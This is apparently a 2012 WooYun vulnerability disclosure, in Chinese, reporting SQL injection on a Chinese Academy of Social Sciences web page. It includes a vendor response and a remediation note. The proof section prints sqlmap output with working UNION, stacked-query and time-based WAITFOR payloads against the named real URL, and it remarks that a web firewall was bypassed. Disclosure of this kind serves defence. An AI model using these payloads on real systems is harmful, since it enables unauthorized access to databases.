当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014836

漏洞标题:留了一年的中科院分站注射

相关厂商:中科院

漏洞作者: Wdot

提交时间:2012-11-16 11:53

修复时间:2012-12-31 11:53

公开时间:2012-12-31 11:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-16: 细节已通知厂商并且等待厂商处理中
2012-11-20: 厂商已经确认,细节仅向厂商公开
2012-11-30: 细节向核心白帽子及相关领域专家公开
2012-12-10: 细节向普通白帽子公开
2012-12-20: 细节向实习白帽子公开
2012-12-31: 细节向公众公开

简要描述:

刚翻出来的,看了文件时间,一年零6天。
现在服务器装有安全狗...安全狗...全狗...狗.....
哇咔咔。还是能射的

详细说明:

http://bic.cass.cn/info/Arcitle_Show_Ac_world.asp?BigClassName=%B4%F3%C7%A7%CA%C0%BD%E7&BigClassID=1+and+1=1


Screen Shot 2012-11-16 at 上午11.20.29.png


安全狗

Screen Shot 2012-11-16 at 上午11.16.47.png


Screen Shot 2012-11-16 at 上午11.17.04.png


Screen Shot 2012-11-16 at 上午11.17.18.png

漏洞证明:

详细说明里贴图了

[11:12:33] [INFO] testing connection to the target url
[11:12:34] [INFO] testing if the url is stable, wait a few seconds
[11:12:35] [INFO] url is stable
[11:12:35] [INFO] testing if GET parameter 'BigClassName' is dynamic
[11:12:36] [WARNING] GET parameter 'BigClassName' does not appear dynamic
[11:12:37] [WARNING] reflective value(s) found and filtering out
[11:12:37] [WARNING] heuristic test shows that GET parameter 'BigClassName' might not be injectable
[11:12:37] [INFO] testing for SQL injection on GET parameter 'BigClassName'
[11:12:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:12:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:12:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:12:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:12:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:13:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:13:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[11:13:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:13:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:13:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:13:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:13:32] [INFO] testing 'Oracle AND time-based blind'
[11:13:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:14:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:14:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[11:15:33] [WARNING] GET parameter 'BigClassName' is not injectable
[11:15:33] [INFO] testing if GET parameter 'BigClassID' is dynamic
[11:15:33] [WARNING] GET parameter 'BigClassID' does not appear dynamic
[11:15:34] [INFO] heuristic test shows that GET parameter 'BigClassID' might be injectable (possible DBMS: Microsoft SQL Server)
[11:15:34] [INFO] testing for SQL injection on GET parameter 'BigClassID'
[11:15:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:15:43] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[11:15:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:15:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:16:01] [INFO] GET parameter 'BigClassID' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[11:16:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:16:13] [INFO] GET parameter 'BigClassID' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[11:16:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:16:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[11:16:15] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:16:19] [INFO] target url appears to have 6 columns in query
[11:16:23] [INFO] GET parameter 'BigClassID' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[11:16:24] [INFO] GET parameter 'BigClassID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 218 HTTP(s) requests:
---
Place: GET
Parameter: BigClassID
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: BigClassName=%B4%F3%C7%A7%CA%C0%BD%E7&BigClassID=2 UNION ALL SELECT NULL,CHAR(58)+CHAR(112)+CHAR(116)+CHAR(122)+CHAR(58)+CHAR(73)+CHAR(98)+CHAR(109)+CHAR(118)+CHAR(114)+CHAR(85)+CHAR(78)+CHAR(99)+CHAR(108)+CHAR(66)+CHAR(58)+CHAR(107)+CHAR(120)+CHAR(102)+CHAR(58),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BigClassName=%B4%F3%C7%A7%CA%C0%BD%E7&BigClassID=2; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BigClassName=%B4%F3%C7%A7%CA%C0%BD%E7&BigClassID=2 WAITFOR DELAY '0:0:5'--
---
[11:16:25] [INFO] testing Microsoft SQL Server
[11:16:25] [INFO] confirming Microsoft SQL Server
[11:16:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:16:28] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 60 times
[11:16:28] [INFO] fetched data logged to text files under '/Volumes/pentest/database/sqlmap/output/bic.cass.cn'
[*] shutting down at 11:16:28

修复方案:

安全狗不系万能滴
程序本身也要补漏

版权声明:转载请注明来源 Wdot@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-11-20 13:43

厂商回复:

CNVD确认漏洞风险点,可以实施注入得到后台数据库实例信息,近几日暂未手工测试未进得到进一步可渗透结果,转由CNVD直接联系网站管理方处置。
按部分影响机密性进行评分,基本危害评分4.96(中),技术发现难度系数1.3,涉及行业或单位影响系数1.3(注:为社科院,非中科院),综合rank=4.96*1.3*1.3=8.382

最新状态:

暂无